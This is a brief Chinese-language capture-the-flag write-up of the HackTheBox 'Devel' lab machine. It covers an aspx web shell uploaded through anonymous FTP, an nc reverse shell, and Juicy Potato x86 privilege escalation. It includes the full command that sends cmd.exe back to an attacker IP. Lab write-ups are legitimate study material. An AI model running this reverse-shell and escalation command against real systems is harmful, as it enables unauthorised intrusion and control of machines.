HackTheBox-Devel

靶机实验HackTheBox
,

OSCP like

扫端口出来21,80.

ftp目录可以匿名访问,直接上传aspx shell。然后nc 建立反弹shell;
20210409-11:40:32-_1Yl7LG_xHE6Oc

20210409-11:40:47-_awvMrL_NohobF

asp会500内部错误。

1
whomai -priv

20210409-11:41:12-_BbW5h9_jE5R3r

提权

上传原版多汁土豆,提示无法运行。使用x86版本的Juicy-Potato-x86.
CLSID:CLSID-List

多汁土豆x86提权

1
Juicy.Potato.x86.exe -l 1111 -p nc.exe -a "10.10.16.69 1222 -e cmd.exe" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

20210408-22:03:01-_oSNd4u_6mDtw6

20210408-22:03:28-_NK56bS_e6gaCY